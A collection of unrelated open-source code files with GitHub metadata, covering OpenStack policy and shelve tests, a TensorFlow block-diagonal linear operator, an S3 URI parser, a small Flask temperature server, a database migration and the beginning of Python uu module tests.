@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_admin_required_false(self):
policy_backend.reset()
value = policy.check((("identity", "admin_required"),),
request=self.request)
self.assertFalse(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_identity_rule_not_found_false(self):
policy_backend.reset()
value = policy.check((("identity", "i_dont_exist"),),
request=self.request)
# this should fail because the default check for
# identity is admin_required
self.assertFalse(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_nova_context_is_admin_false(self):
policy_backend.reset()
value = policy.check((("compute", "context_is_admin"),),
request=self.request)
self.assertFalse(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_compound_check_false(self):
policy_backend.reset()
value = policy.check((("identity", "admin_required"),
("identity", "identity:default"),),
request=self.request)
self.assertFalse(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_scope_not_found(self):
policy_backend.reset()
value = policy.check((("dummy", "default"),),
request=self.request)
self.assertTrue(value)
class PolicyBackendTestCaseAdmin(test.BaseAdminViewTests):
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_admin_required_true(self):
policy_backend.reset()
value = policy.check((("identity", "admin_required"),),
request=self.request)
self.assertTrue(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_identity_rule_not_found_true(self):
policy_backend.reset()
value = policy.check((("identity", "i_dont_exist"),),
request=self.request)
# this should succeed because the default check for
# identity is admin_required
self.assertTrue(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_compound_check_true(self):
policy_backend.reset()
value = policy.check((("identity", "admin_required"),
("identity", "identity:default"),),
request=self.request)
self.assertTrue(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_nova_context_is_admin_true(self):
policy_backend.reset()
value = policy.check((("compute", "context_is_admin"),),
request=self.request)
self.assertTrue(value)
|
{
"content_hash": "48f4bcbec4e41a032591483bdf385c9d",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 66,
"avg_line_length": 40.81318681318681,
"alnum_prop": 0.6284329563812601,
"repo_name": "bigswitch/horizon",
"id": "48e7b822858efd9f17c3c66634f6c921214b4c82",
"size": "4287",
"binary": false,
"copies": "13",
"ref": "refs/heads/master",
"path": "openstack_dashboard/test/tests/policy_backend.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "169426"
},
{
"name": "HTML",
"bytes": "504623"
},
{
"name": "JavaScript",
"bytes": "2470379"
},
{
"name": "Makefile",
"bytes": "588"
},
{
"name": "Python",
"bytes": "5016450"
},
{
"name": "Shell",
"bytes": "20010"
}
],
"symlink_target": ""
}
|
"""Create a Block Diagonal operator from one or more `LinearOperators`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops.linalg import linear_operator
from tensorflow.python.ops.linalg import linear_operator_util
from tensorflow.python.util.tf_export import tf_export
__all__ = ["LinearOperatorBlockDiag"]
@tf_export("linalg.LinearOperatorBlockDiag")
class LinearOperatorBlockDiag(linear_operator.LinearOperator):
"""Combines one or more `LinearOperators` in to a Block Diagonal matrix.
This operator combines one or more linear operators `[op1,...,opJ]`,
building a new `LinearOperator`, whose underlying matrix representation is
square and has each operator `opi` on the main diagonal, and zero's elsewhere.
#### Shape compatibility
If `opj` acts like a [batch] square matrix `Aj`, then `op_combined` acts like
the [batch] square matrix formed by having each matrix `Aj` on the main
diagonal.
Each `opj` is required to represent a square matrix, and hence will have
shape `batch_shape_j + [M_j, M_j]`.
If `opj` has shape `batch_shape_j + [M_j, M_j]`, then the combined operator
has shape `broadcast_batch_shape + [sum M_j, sum M_j]`, where
`broadcast_batch_shape` is the mutual broadcast of `batch_shape_j`,
`j = 1,...,J`, assuming the intermediate batch shapes broadcast.
Even if the combined shape is well defined, the combined operator's
methods may fail due to lack of broadcasting ability in the defining
operators' methods.
```python
# Create a 4 x 4 linear operator combined of two 2 x 2 operators.
operator_1 = LinearOperatorFullMatrix([[1., 2.], [3., 4.]])
operator_2 = LinearOperatorFullMatrix([[1., 0.], [0., 1.]])
operator = LinearOperatorBlockDiag([operator_1, operator_2])
operator.to_dense()
==> [[1., 2., 0., 0.],
[3., 4., 0., 0.],
[0., 0., 1., 0.],
[0., 0., 0., 1.]]
operator.shape
==> [4, 4]
operator.log_abs_determinant()
==> scalar Tensor
x1 = ... # Shape [2, 2] Tensor
x2 = ... # Shape [2, 2] Tensor
x = tf.concat([x1, x2], 0) # Shape [2, 4] Tensor
operator.matmul(x)
==> tf.concat([operator_1.matmul(x1), operator_2.matmul(x2)])
# Create a [2, 3] batch of 4 x 4 linear operators.
matrix_44 = tf.random.normal(shape=[2, 3, 4, 4])
operator_44 = LinearOperatorFullMatrix(matrix)
# Create a [1, 3] batch of 5 x 5 linear operators.
matrix_55 = tf.random.normal(shape=[1, 3, 5, 5])
operator_55 = LinearOperatorFullMatrix(matrix_55)
# Combine to create a [2, 3] batch of 9 x 9 operators.
operator_99 = LinearOperatorBlockDiag([operator_44, operator_55])
# Create a shape [2, 3, 9] vector.
x = tf.random.normal(shape=[2, 3, 9])
operator_99.matmul(x)
==> Shape [2, 3, 9] Tensor
```
#### Performance
The performance of `LinearOperatorBlockDiag` on any operation is equal to
the sum of the individual operators' operations.
#### Matrix property hints
This `LinearOperator` is initialized with boolean flags of the form `is_X`,
for `X = non_singular, self_adjoint, positive_definite, square`.
These have the following meaning:
* If `is_X == True`, callers should expect the operator to have the
property `X`. This is a promise that should be fulfilled, but is *not* a
runtime assert. For example, finite floating point precision may result
in these promises being violated.
* If `is_X == False`, callers should expect the operator to not have `X`.
* If `is_X == None` (the default), callers should have no expectation either
way.
"""
def __init__(self,
operators,
is_non_singular=None,
is_self_adjoint=None,
is_positive_definite=None,
is_square=True,
name=None):
r"""Initialize a `LinearOperatorBlockDiag`.
`LinearOperatorBlockDiag` is initialized with a list of operators
`[op_1,...,op_J]`.
Args:
operators: Iterable of `LinearOperator` objects, each with
the same `dtype` and composable shape.
is_non_singular: Expect that this operator is non-singular.
is_self_adjoint: Expect that this operator is equal to its hermitian
transpose.
is_positive_definite: Expect that this operator is positive definite,
meaning the quadratic form `x^H A x` has positive real part for all
nonzero `x`. Note that we do not require the operator to be
self-adjoint to be positive-definite. See:
https://en.wikipedia.org/wiki/Positive-definite_matrix#Extension_for_non-symmetric_matrices
is_square: Expect that this operator acts like square [batch] matrices.
This is true by default, and will raise a `ValueError` otherwise.
name: A name for this `LinearOperator`. Default is the individual
operators names joined with `_o_`.
Raises:
TypeError: If all operators do not have the same `dtype`.
ValueError: If `operators` is empty or are non-square.
"""
# Validate operators.
check_ops.assert_proper_iterable(operators)
operators = list(operators)
if not operators:
raise ValueError(
"Expected a non-empty list of operators. Found: %s" % operators)
self._operators = operators
# Validate dtype.
dtype = operators[0].dtype
for operator in operators:
if operator.dtype != dtype:
name_type = (str((o.name, o.dtype)) for o in operators)
raise TypeError(
"Expected all operators to have the same dtype. Found %s"
% " ".join(name_type))
# Auto-set and check hints.
if all(operator.is_non_singular for operator in operators):
if is_non_singular is False:
raise ValueError(
"The direct sum of non-singular operators is always non-singular.")
is_non_singular = True
if all(operator.is_self_adjoint for operator in operators):
if is_self_adjoint is False:
raise ValueError(
"The direct sum of self-adjoint operators is always self-adjoint.")
is_self_adjoint = True
if all(operator.is_positive_definite for operator in operators):
if is_positive_definite is False:
raise ValueError(
"The direct sum of positive definite operators is always "
"positive definite.")
is_positive_definite = True
if not (is_square and all(operator.is_square for operator in operators)):
raise ValueError(
"Can only represent a block diagonal of square matrices.")
# Initialization.
graph_parents = []
for operator in operators:
graph_parents.extend(operator.graph_parents)
if name is None:
# Using ds to mean direct sum.
name = "_ds_".join(operator.name for operator in operators)
with ops.name_scope(name, values=graph_parents):
super(LinearOperatorBlockDiag, self).__init__(
dtype=dtype,
graph_parents=graph_parents,
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
is_square=True,
name=name)
@property
def operators(self):
return self._operators
def _shape(self):
# Get final matrix shape.
domain_dimension = self.operators[0].domain_dimension
range_dimension = self.operators[0].range_dimension
for operator in self.operators[1:]:
domain_dimension += operator.domain_dimension
range_dimension += operator.range_dimension
matrix_shape = tensor_shape.TensorShape([domain_dimension, range_dimension])
# Get broadcast batch shape.
# broadcast_shape checks for compatibility.
batch_shape = self.operators[0].batch_shape
for operator in self.operators[1:]:
batch_shape = common_shapes.broadcast_shape(
batch_shape, operator.batch_shape)
return batch_shape.concatenate(matrix_shape)
def _shape_tensor(self):
# Avoid messy broadcasting if possible.
if self.shape.is_fully_defined():
return ops.convert_to_tensor(
self.shape.as_list(), dtype=dtypes.int32, name="shape")
domain_dimension = self.operators[0].domain_dimension_tensor()
range_dimension = self.operators[0].range_dimension_tensor()
for operator in self.operators[1:]:
domain_dimension += operator.domain_dimension_tensor()
range_dimension += operator.range_dimension_tensor()
matrix_shape = array_ops.stack([domain_dimension, range_dimension])
# Dummy Tensor of zeros. Will never be materialized.
zeros = array_ops.zeros(shape=self.operators[0].batch_shape_tensor())
for operator in self.operators[1:]:
zeros += array_ops.zeros(shape=operator.batch_shape_tensor())
batch_shape = array_ops.shape(zeros)
return array_ops.concat((batch_shape, matrix_shape), 0)
def _matmul(self, x, adjoint=False, adjoint_arg=False):
split_dim = -1 if adjoint_arg else -2
# Split input by rows normally, and otherwise columns.
split_x = self._split_input_into_blocks(x, axis=split_dim)
result_list = []
for index, operator in enumerate(self.operators):
result_list += [operator.matmul(
split_x[index], adjoint=adjoint, adjoint_arg=adjoint_arg)]
result_list = linear_operator_util.broadcast_matrix_batch_dims(
result_list)
return array_ops.concat(result_list, axis=-2)
def _determinant(self):
result = self.operators[0].determinant()
for operator in self.operators[1:]:
result *= operator.determinant()
return result
def _log_abs_determinant(self):
result = self.operators[0].log_abs_determinant()
for operator in self.operators[1:]:
result += operator.log_abs_determinant()
return result
def _solve(self, rhs, adjoint=False, adjoint_arg=False):
split_dim = -1 if adjoint_arg else -2
# Split input by rows normally, and otherwise columns.
split_rhs = self._split_input_into_blocks(rhs, axis=split_dim)
solution_list = []
for index, operator in enumerate(self.operators):
solution_list += [operator.solve(
split_rhs[index], adjoint=adjoint, adjoint_arg=adjoint_arg)]
solution_list = linear_operator_util.broadcast_matrix_batch_dims(
solution_list)
return array_ops.concat(solution_list, axis=-2)
def _diag_part(self):
diag_list = []
for operator in self.operators:
# Extend the axis for broadcasting.
diag_list += [operator.diag_part()[..., array_ops.newaxis]]
diag_list = linear_operator_util.broadcast_matrix_batch_dims(diag_list)
diagonal = array_ops.concat(diag_list, axis=-2)
return array_ops.squeeze(diagonal, axis=-1)
def _trace(self):
result = self.operators[0].trace()
for operator in self.operators[1:]:
result += operator.trace()
return result
def _to_dense(self):
num_cols = 0
rows = []
broadcasted_blocks = [operator.to_dense() for operator in self.operators]
broadcasted_blocks = linear_operator_util.broadcast_matrix_batch_dims(
broadcasted_blocks)
for block in broadcasted_blocks:
batch_row_shape = array_ops.shape(block)[:-1]
zeros_to_pad_before_shape = array_ops.concat(
[batch_row_shape, [num_cols]], axis=-1)
zeros_to_pad_before = array_ops.zeros(
shape=zeros_to_pad_before_shape, dtype=block.dtype)
num_cols += array_ops.shape(block)[-1]
zeros_to_pad_after_shape = array_ops.concat(
[batch_row_shape,
[self.domain_dimension_tensor() - num_cols]], axis=-1)
zeros_to_pad_after = array_ops.zeros(
shape=zeros_to_pad_after_shape, dtype=block.dtype)
rows.append(array_ops.concat(
[zeros_to_pad_before, block, zeros_to_pad_after], axis=-1))
mat = array_ops.concat(rows, axis=-2)
mat.set_shape(self.shape)
return mat
def _assert_non_singular(self):
return control_flow_ops.group([
operator.assert_non_singular() for operator in self.operators])
def _assert_self_adjoint(self):
return control_flow_ops.group([
operator.assert_self_adjoint() for operator in self.operators])
def _assert_positive_definite(self):
return control_flow_ops.group([
operator.assert_positive_definite() for operator in self.operators])
def _split_input_into_blocks(self, x, axis=-1):
"""Split `x` into blocks matching `operators`'s `domain_dimension`.
Specifically, if we have a block diagonal matrix, with block sizes
`[M_j, M_j] j = 1..J`, this method splits `x` on `axis` into `J`
tensors, whose shape at `axis` is `M_j`.
Args:
x: `Tensor`. `x` is split into `J` tensors.
axis: Python `Integer` representing the axis to split `x` on.
Returns:
A list of `Tensor`s.
"""
block_sizes = []
if self.shape.is_fully_defined():
for operator in self.operators:
block_sizes += [operator.domain_dimension.value]
else:
for operator in self.operators:
block_sizes += [operator.domain_dimension_tensor()]
return array_ops.split(x, block_sizes, axis=axis)
|
{
"content_hash": "8d2e03b61660d04266fbe72aa6704fd6",
"timestamp": "",
"source": "github",
"line_count": 360,
"max_line_length": 99,
"avg_line_length": 37.41388888888889,
"alnum_prop": 0.6717647932288959,
"repo_name": "ghchinoy/tensorflow",
"id": "6a3c0debaff78ef4ff7a2b42f07a8a7ce965abb6",
"size": "14158",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/python/ops/linalg/linear_operator_block_diag.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3568"
},
{
"name": "Batchfile",
"bytes": "15317"
},
{
"name": "C",
"bytes": "699905"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "67022491"
},
{
"name": "CMake",
"bytes": "206499"
},
{
"name": "Dockerfile",
"bytes": "73602"
},
{
"name": "Go",
"bytes": "1585039"
},
{
"name": "HTML",
"bytes": "4680118"
},
{
"name": "Java",
"bytes": "836400"
},
{
"name": "Jupyter Notebook",
"bytes": "1665583"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "98194"
},
{
"name": "Objective-C",
"bytes": "94022"
},
{
"name": "Objective-C++",
"bytes": "175222"
},
{
"name": "PHP",
"bytes": "17600"
},
{
"name": "Pascal",
"bytes": "3239"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "48407007"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "4733"
},
{
"name": "Shell",
"bytes": "476920"
},
{
"name": "Smarty",
"bytes": "27495"
},
{
"name": "Swift",
"bytes": "56155"
}
],
"symlink_target": ""
}
|
import logging
from celery.task.base import task
from django.db.models.loading import get_model
logger = logging.getLogger('getpaid.backends.przelewy24')
@task
def get_payment_status_task(payment_id, p24_session_id, p24_order_id, p24_kwota):
Payment = get_model('getpaid', 'Payment')
try:
payment = Payment.objects.get(pk=int(payment_id))
except Payment.DoesNotExist:
logger.error('Payment does not exist pk=%d' % payment_id)
return
from getpaid.backends.przelewy24 import PaymentProcessor # Avoiding circular import
processor = PaymentProcessor(payment)
processor.get_payment_status(p24_session_id, p24_order_id, p24_kwota)
|
{
"content_hash": "e691fd52d7c58aa02e778484ac863ebf",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 88,
"avg_line_length": 35.68421052631579,
"alnum_prop": 0.7315634218289085,
"repo_name": "pawciobiel/django-getpaid",
"id": "ec04a43d47eef6c88f63e5315cc57acb69246b37",
"size": "678",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "getpaid/backends/przelewy24/tasks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "6266"
},
{
"name": "Python",
"bytes": "156307"
}
],
"symlink_target": ""
}
|
import os
import re
import sys
from BidirMap import BidirMap
from logging import debug
import S3
from Utils import unicodise, check_bucket_name_dns_conformity
class S3Uri(object):
type = None
_subclasses = None
def __new__(self, string):
if not self._subclasses:
## Generate a list of all subclasses of S3Uri
self._subclasses = []
dict = sys.modules[__name__].__dict__
for something in dict:
if type(dict[something]) is not type(self):
continue
if issubclass(dict[something], self) and dict[something] != self:
self._subclasses.append(dict[something])
for subclass in self._subclasses:
try:
instance = object.__new__(subclass)
instance.__init__(string)
return instance
except ValueError, e:
continue
raise ValueError("%s: not a recognized URI" % string)
def __str__(self):
return self.uri()
def __unicode__(self):
return self.uri()
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self.__unicode__())
def public_url(self):
raise ValueError("This S3 URI does not have Anonymous URL representation")
def basename(self):
return self.__unicode__().split("/")[-1]
class S3UriS3(S3Uri):
type = "s3"
_re = re.compile("^s3://([^/]+)/?(.*)", re.IGNORECASE)
def __init__(self, string):
match = self._re.match(string)
if not match:
raise ValueError("%s: not a S3 URI" % string)
groups = match.groups()
self._bucket = groups[0]
self._object = unicodise(groups[1])
def bucket(self):
return self._bucket
def object(self):
return self._object
def has_bucket(self):
return bool(self._bucket)
def has_object(self):
return bool(self._object)
def uri(self):
return "/".join(["s3:/", self._bucket, self._object])
def is_dns_compatible(self):
return check_bucket_name_dns_conformity(self._bucket)
def public_url(self):
if self.is_dns_compatible():
return "http://%s.s3.amazonaws.com/%s" % (self._bucket, self._object)
else:
return "http://s3.amazonaws.com/%s/%s" % (self._bucket, self._object)
def host_name(self):
if self.is_dns_compatible():
return "%s.s3.amazonaws.com" % (self._bucket)
else:
return "s3.amazonaws.com"
@staticmethod
def compose_uri(bucket, object = ""):
return "s3://%s/%s" % (bucket, object)
@staticmethod
def httpurl_to_s3uri(http_url):
m=re.match("(https?://)?([^/]+)/?(.*)", http_url, re.IGNORECASE)
hostname, object = m.groups()[1:]
hostname = hostname.lower()
if hostname == "s3.amazonaws.com":
## old-style url: http://s3.amazonaws.com/bucket/object
if object.count("/") == 0:
## no object given
bucket = object
object = ""
else:
## bucket/object
bucket, object = object.split("/", 1)
elif hostname.endswith(".s3.amazonaws.com"):
## new-style url: http://bucket.s3.amazonaws.com/object
bucket = hostname[:-(len(".s3.amazonaws.com"))]
else:
raise ValueError("Unable to parse URL: %s" % http_url)
return S3Uri("s3://%(bucket)s/%(object)s" % {
'bucket' : bucket,
'object' : object })
class S3UriS3FS(S3Uri):
type = "s3fs"
_re = re.compile("^s3fs://([^/]*)/?(.*)", re.IGNORECASE)
def __init__(self, string):
match = self._re.match(string)
if not match:
raise ValueError("%s: not a S3fs URI" % string)
groups = match.groups()
self._fsname = groups[0]
self._path = unicodise(groups[1]).split("/")
def fsname(self):
return self._fsname
def path(self):
return "/".join(self._path)
def uri(self):
return "/".join(["s3fs:/", self._fsname, self.path()])
class S3UriFile(S3Uri):
type = "file"
_re = re.compile("^(\w+://)?(.*)")
def __init__(self, string):
match = self._re.match(string)
groups = match.groups()
if groups[0] not in (None, "file://"):
raise ValueError("%s: not a file:// URI" % string)
self._path = unicodise(groups[1]).split("/")
def path(self):
return "/".join(self._path)
def uri(self):
return "/".join(["file:/", self.path()])
def isdir(self):
return os.path.isdir(self.path())
def dirname(self):
return os.path.dirname(self.path())
class S3UriCloudFront(S3Uri):
type = "cf"
_re = re.compile("^cf://([^/]*)/*(.*)", re.IGNORECASE)
def __init__(self, string):
match = self._re.match(string)
if not match:
raise ValueError("%s: not a CloudFront URI" % string)
groups = match.groups()
self._dist_id = groups[0]
self._request_id = groups[1] != "/" and groups[1] or None
def dist_id(self):
return self._dist_id
def request_id(self):
return self._request_id
def uri(self):
uri = "cf://" + self.dist_id()
if self.request_id():
uri += "/" + self.request_id()
return uri
if __name__ == "__main__":
uri = S3Uri("s3://bucket/object")
print "type() =", type(uri)
print "uri =", uri
print "uri.type=", uri.type
print "bucket =", uri.bucket()
print "object =", uri.object()
print
uri = S3Uri("s3://bucket")
print "type() =", type(uri)
print "uri =", uri
print "uri.type=", uri.type
print "bucket =", uri.bucket()
print
uri = S3Uri("s3fs://filesystem1/path/to/remote/file.txt")
print "type() =", type(uri)
print "uri =", uri
print "uri.type=", uri.type
print "path =", uri.path()
print
uri = S3Uri("/path/to/local/file.txt")
print "type() =", type(uri)
print "uri =", uri
print "uri.type=", uri.type
print "path =", uri.path()
print
uri = S3Uri("cf://1234567890ABCD/")
print "type() =", type(uri)
print "uri =", uri
print "uri.type=", uri.type
print "dist_id =", uri.dist_id()
print
# vim:et:ts=4:sts=4:ai
|
{
"content_hash": "a802dc46a3c3681a550e353f9e3ad543",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 82,
"avg_line_length": 29.63594470046083,
"alnum_prop": 0.532887575804696,
"repo_name": "zhm/s3_cmd_bin",
"id": "e53d46a63936d873f3f49238b0f2d43105272591",
"size": "6560",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "resources/S3/S3Uri.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "6305"
},
{
"name": "Python",
"bytes": "294114"
},
{
"name": "Ruby",
"bytes": "1256"
},
{
"name": "Shell",
"bytes": "350"
}
],
"symlink_target": ""
}
|
import uuid
import webob
from nova.api.openstack.compute.contrib import shelve as shelve_v2
from nova.api.openstack.compute.plugins.v3 import shelve as shelve_v21
from nova.compute import api as compute_api
from nova import db
from nova import exception
from nova.openstack.common import policy as common_policy
from nova import policy
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
def fake_instance_get_by_uuid(context, instance_id,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'name': 'fake', 'project_id': '%s_unequal' % context.project_id})
def fake_auth_context(context):
return True
class ShelvePolicyTestV21(test.NoDBTestCase):
plugin = shelve_v21
prefix = 'v3:os-shelve:'
offload = 'shelve_offload'
def setUp(self):
super(ShelvePolicyTestV21, self).setUp()
self.controller = self.plugin.ShelveController()
self.req = fakes.HTTPRequest.blank('')
def test_shelve_restricted_by_role(self):
rules = {'compute_extension:%sshelve' % self.prefix:
common_policy.parse_rule('role:admin')}
policy.set_rules(rules)
self.assertRaises(exception.Forbidden, self.controller._shelve,
self.req, str(uuid.uuid4()), {})
def test_shelve_allowed(self):
rules = {'compute:get': common_policy.parse_rule(''),
'compute_extension:%sshelve' % self.prefix:
common_policy.parse_rule('')}
policy.set_rules(rules)
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.assertRaises(exception.Forbidden, self.controller._shelve,
self.req, str(uuid.uuid4()), {})
def test_shelve_locked_server(self):
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.stubs.Set(self.plugin, 'auth_shelve', fake_auth_context)
self.stubs.Set(compute_api.API, 'shelve',
fakes.fake_actions_to_locked_server)
self.assertRaises(webob.exc.HTTPConflict, self.controller._shelve,
self.req, str(uuid.uuid4()), {})
def test_unshelve_restricted_by_role(self):
rules = {'compute_extension:%sunshelve' % self.prefix:
common_policy.parse_rule('role:admin')}
policy.set_rules(rules)
self.assertRaises(exception.Forbidden, self.controller._unshelve,
self.req, str(uuid.uuid4()), {})
def test_unshelve_allowed(self):
rules = {'compute:get': common_policy.parse_rule(''),
'compute_extension:%sunshelve' % self.prefix:
common_policy.parse_rule('')}
policy.set_rules(rules)
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.assertRaises(exception.Forbidden, self.controller._unshelve,
self.req, str(uuid.uuid4()), {})
def test_unshelve_locked_server(self):
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.stubs.Set(self.plugin, 'auth_unshelve', fake_auth_context)
self.stubs.Set(compute_api.API, 'unshelve',
fakes.fake_actions_to_locked_server)
self.assertRaises(webob.exc.HTTPConflict, self.controller._unshelve,
self.req, str(uuid.uuid4()), {})
def test_shelve_offload_restricted_by_role(self):
rules = {'compute_extension:%s%s' % (self.prefix, self.offload):
common_policy.parse_rule('role:admin')}
policy.set_rules(rules)
self.assertRaises(exception.Forbidden,
self.controller._shelve_offload, self.req,
str(uuid.uuid4()), {})
def test_shelve_offload_allowed(self):
rules = {'compute:get': common_policy.parse_rule(''),
'compute_extension:%s%s' % (self.prefix, self.offload):
common_policy.parse_rule('')}
policy.set_rules(rules)
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.assertRaises(exception.Forbidden,
self.controller._shelve_offload,
self.req, str(uuid.uuid4()), {})
def test_shelve_offload_locked_server(self):
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get_by_uuid)
self.stubs.Set(self.plugin, 'auth_shelve_offload', fake_auth_context)
self.stubs.Set(compute_api.API, 'shelve_offload',
fakes.fake_actions_to_locked_server)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._shelve_offload,
self.req, str(uuid.uuid4()), {})
class ShelvePolicyTestV2(ShelvePolicyTestV21):
plugin = shelve_v2
prefix = ''
offload = 'shelveOffload'
|
{
"content_hash": "b0ca4f83577c43d7a3f97fef1d859f01",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 77,
"avg_line_length": 40.368852459016395,
"alnum_prop": 0.6235532994923858,
"repo_name": "affo/nova",
"id": "ce5760fef1c3be4889c7a34ad3e1c1c80573de29",
"size": "5523",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "nova/tests/unit/api/openstack/compute/contrib/test_shelve.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "3223"
},
{
"name": "Python",
"bytes": "15659662"
},
{
"name": "Shell",
"bytes": "20716"
}
],
"symlink_target": ""
}
|
import config
from flask import Flask, render_template, send_from_directory, jsonify, request
from datetime import datetime, timedelta
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from models import TemperatureMeasurement
app = Flask(__name__)
# Set up the DB
engine = create_engine(config.DB_STRING, echo=True)
Session = sessionmaker(bind=engine)
session = Session()
@app.route("/")
def start():
return render_template('index.html')
@app.route('/get_data')
def get_data():
start = request.args.get('start', None, type=str)
end = request.args.get('end', None, type=str)
# Last X days
days = request.args.get('d', None, type=str)
if start and end:
print(start, end, type(start))
q = session.query(TemperatureMeasurement).filter(
TemperatureMeasurement.moment.between(start, end)
).all()
elif days:
days_ago = datetime.now() - timedelta(days=int(days))
from_date = str(days_ago.date())
q = session.query(TemperatureMeasurement).filter(
TemperatureMeasurement.moment >= from_date
).all()
else:
q = session.query(TemperatureMeasurement).all()
data = [i.as_dict() for i in q]
return jsonify(items=data)
# return "asd"
@app.route('/js/<path:path>')
def send_js(path):
return send_from_directory('/home/pi/raspy/server/js/', path)
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0')
|
{
"content_hash": "42ab5f87f01f875e8bcb0a8b280b347e",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 79,
"avg_line_length": 28.80392156862745,
"alnum_prop": 0.6589516678012253,
"repo_name": "ganiserb/raspy",
"id": "91437b98b3dddd91db3d71a9100fe302d1b9c803",
"size": "1484",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "587"
},
{
"name": "JavaScript",
"bytes": "825"
},
{
"name": "Python",
"bytes": "4161"
},
{
"name": "Shell",
"bytes": "352"
}
],
"symlink_target": ""
}
|
"""Migration for a given Submitty course database."""
def up(config, database, semester, course):
"""
Run up migration.
:param config: Object holding configuration details about Submitty
:type config: migrator.config.Config
:param database: Object for interacting with given database for environment
:type database: migrator.db.Database
:param semester: Semester of the course being migrated
:type semester: str
:param course: Code of course being migrated
:type course: str
"""
database.execute("ALTER TABLE lichen ADD COLUMN IF NOT EXISTS other_gradeable_paths TEXT;")
def down(config, database, semester, course):
"""
Run down migration (rollback).
:param config: Object holding configuration details about Submitty
:type config: migrator.config.Config
:param database: Object for interacting with given database for environment
:type database: migrator.db.Database
:param semester: Semester of the course being migrated
:type semester: str
:param course: Code of course being migrated
:type course: str
"""
pass
|
{
"content_hash": "af032c2b8c5e195501c5e195af516a6f",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 95,
"avg_line_length": 33.878787878787875,
"alnum_prop": 0.7191413237924866,
"repo_name": "Submitty/Submitty",
"id": "c1586c9f36341587844be99c2e2e3a9856ce4f78",
"size": "1118",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "migration/migrator/migrations/course/20211103234638_plagiarism_arbitrary_paths.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "8450"
},
{
"name": "C++",
"bytes": "496998"
},
{
"name": "CMake",
"bytes": "1561"
},
{
"name": "CSS",
"bytes": "210295"
},
{
"name": "HTML",
"bytes": "799796"
},
{
"name": "Java",
"bytes": "3828"
},
{
"name": "JavaScript",
"bytes": "981630"
},
{
"name": "PHP",
"bytes": "3103857"
},
{
"name": "PLpgSQL",
"bytes": "122825"
},
{
"name": "Python",
"bytes": "1589891"
},
{
"name": "Shell",
"bytes": "205161"
},
{
"name": "TeX",
"bytes": "21960"
},
{
"name": "Twig",
"bytes": "1239136"
},
{
"name": "TypeScript",
"bytes": "17328"
}
],
"symlink_target": ""
}
|
"""
Tests for uu module.
Nick Mathewson
"""
import unittest
from test import support
import os
import stat
import sys
import uu
import io
plaintext = b"The symbols on top of your keyboard are !@#$%^&*()_+|~\n"
encodedtext = b"""\
M5&AE('-Y;6)O;',@;VX@=&]P(&]F('EO=7(@:V5Y8F]A<F0@87)E("% (R0E
*7B8J*"E?*WQ^"@ """
# Stolen from io.py
class FakeIO(io.TextIOWrapper):
"""Text I/O implementation using an in-memory buffer.
Can be a used as a drop-in replacement for sys.stdin and sys.stdout.
"""
# XXX This is really slow, but fully functional
def __init__(self, initial_value="", encoding="utf-8",
errors="strict", newline="\n"):
super(FakeIO, self).__init__(io.BytesIO(),
encoding=encoding,
errors=errors,
newline=newline)
